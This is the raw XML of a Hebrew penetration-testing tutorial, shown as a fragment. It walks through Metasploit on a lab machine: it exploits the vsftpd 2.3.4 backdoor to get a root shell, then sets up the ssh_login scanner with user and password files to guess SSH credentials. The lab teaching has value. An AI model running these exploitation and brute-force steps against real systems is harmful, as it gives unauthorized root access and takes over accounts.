        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של המחשב הנתקף.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57324224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</w:rPr>
        <w:t>RPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הוא 21 שכבר מוגדר אין צורך לגעת בו.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E203A7E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הכתובות שלי היא 192.168.1.156 (אצל כל אחד הכתובת יכולה להיות שונה)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7570BE53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עכשיו נגדיר את ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RHOSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01426C18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הפקודה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C398498" w14:textId="285D5E49" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00D732F6" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et RHOSTS 192.168.1.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A0BE0B" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251781120" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51C077F1" wp14:editId="2F627EA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646545" cy="516693"/>
            <wp:effectExtent l="0" t="0" r="1905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DCCBF" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi" w:hint="cs"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E4722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ולאחר מכן נריץ את הפקודה: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FC604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82144" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50C1A0EC" wp14:editId="70A2297B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>15240</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6652260" cy="1264920"/>
            <wp:effectExtent l="0" t="0" r="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60B96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4F74F23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EA3BCCA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A8E91BD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38344DD4" w14:textId="125FD754" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00D732F6" w:rsidP="00B06C42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ועכשיו כמו שאפשר לראות נפתח לנו </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כמשתמש </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4"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83168" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6144B990" wp14:editId="181E38D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-137160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>296545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5125085" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="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A8319" w14:textId="3D39070D" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="006E68E4">
      <w:pPr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FD05636" wp14:editId="7C9138A1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5192486</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>113484</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1475921" cy="146957"/>
                <wp:effectExtent l="0" t="0" r="10160" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="120" name="מלבן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921" cy="14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5DD29" id="מלבן 120" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:408.85pt;margin-top:8.95pt;width:116.2pt;height:11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" filled="f" strokecolor="yellow" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006E68E4"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27200" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3542030A" wp14:editId="5A774BF9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>5166360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1653540" cy="480060"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone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4420E" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0386E31D" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:ind w:left="360"/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84192" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59858FEA" wp14:editId="2DAA6E51">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>5204460</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>11430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1417320" cy="1489083"/>
            <wp:effectExtent l="0" t="0" r="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8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382B6" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7A5C48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0432F9AC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32A0E1D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1051BAB" w14:textId="591C8BC3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372AA456" w14:textId="79EF51AD" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1D6344" w14:textId="1B7606A4" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E97A74" w14:textId="2D0B6273" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CC92FF" w14:textId="4B300379" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0213B3" w14:textId="46BA6C3B" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D6E1BB" w14:textId="669EBC04" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="729FD3AB" w14:textId="78884EBD" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2041A02C" w14:textId="10AA8709" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790B2FF2" w14:textId="6A36711F" w:rsidR="00CE457A" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459E9D2F" w14:textId="77777777" w:rsidR="009F468F" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256ACF9A" w14:textId="77777777" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C75719" w14:textId="57650278" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="00CE457A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D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
      </w:r>
      <w:r w:rsidR="0002686C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499942EC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המודול הבא עוסק בחשיפת שם משתמש וסיסמא לצורך התחברות מוצפנת באמצעות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A925F6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85216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EDE32B4" wp14:editId="7D488406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6644640" cy="2918460"/>
            <wp:effectExtent l="0" t="0" r="3810" b="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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">נתחיל בפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F221A1E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A50E33D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3C2A7C0B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4E58684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34664B9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536EF7A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31FE862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5A22D73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05A703C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348452D" w14:textId="772B0C32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F9DE832" w14:textId="28939B42" w:rsidR="00D732F6" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="00B06C42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וכאן נבחר את אפשרות מס 21 </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7A024" w14:textId="77777777" w:rsidR="00497E2B" w:rsidRPr="007D51BF" w:rsidRDefault="00497E2B" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36068A71" w14:textId="5A33BC9C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נעתיק את השורה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>auxiliary/scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לשרות הפקודה בשימוש </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F9D649" w14:textId="5EDE736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0389FCC9" wp14:editId="2D0FF6A6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6068060" cy="285753"/>
            <wp:effectExtent l="0" t="0" r="8890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8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E8211" w14:textId="278950C2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064AFB66" w14:textId="68502B02" w:rsidR="00F654FA" w:rsidRPr="007D51BF" w:rsidRDefault="00F654FA" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD99B9C" w14:textId="77777777" w:rsidR="00497E2B" w:rsidRPr="007D51BF" w:rsidRDefault="00497E2B" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F08DF5" w14:textId="00D887CB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כעת הפקודה הבאה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> תציג את הפרמטרים שצריך למלא </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882CA4B" w14:textId="0DDE1E04" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00B06C42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87264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01C0E2D8" wp14:editId="1DC4BFFD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-144780</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-31750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6880860" cy="2306320"/>
            <wp:effectExtent l="0" t="0" r="0" b="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7745E" w14:textId="58F21C12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957FAD0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F3DCE0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1160C42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5E1036A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44CBF43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58DF5834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386B0B4" w14:textId="77777777" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3DD34E" w14:textId="77777777" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614C602E" w14:textId="77777777" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478A36B2" w14:textId="77777777" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B0CFCD" w14:textId="77777777" w:rsidR="00CE457A" w:rsidRPr="007D51BF" w:rsidRDefault="00CE457A" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B47ADBE" w14:textId="5A84E6E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">להבדיל מהמודול הקודם </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vsftpd 2.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כאן אנחנו מתבקשים למלא </w:t>
      </w:r>
      <w:r w:rsidR="009D3A4F" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">קצת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">יותר פרטים ולבצע מספר שינויים </w:t>
      </w:r>
      <w:r w:rsidR="009D3A4F" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ו</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">נתבקש </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E1063F" w14:textId="2A0FF7F8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  <w:rtl/>
        </w:rPr>
        <w:t>להגדיר קובץ סיסמאות וקובץ משתמשים במקרה הזה הכנתי את הקבצים האלו מראש</w:t>
      </w:r>
      <w:r w:rsidR="009D3A4F" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB98FE0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                                                                </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pass file</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">User file </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD18147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90336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FF47982" wp14:editId="30E6170A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2682240</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7619</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2415540" cy="1744557"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255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76" cy="176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060EB7EC" wp14:editId="7DB291A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377440" cy="1722120"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0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 wp14:anchorId="468B9BD9" wp14:editId="74E6B35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982980" cy="1699260"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapNone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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0359793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1A8B95C3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77FD137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2E0637E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3555B982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34BA76CF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706CC115" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/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הגדרה של קובץ סיסמאות</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS_FILE –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17383353" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/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הגדרה של קובץ משתמשים </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> USER_FILE –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215B1D2" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/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 wp14:anchorId="517BE754" wp14:editId="196654C3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6880860" cy="1136661"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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113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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
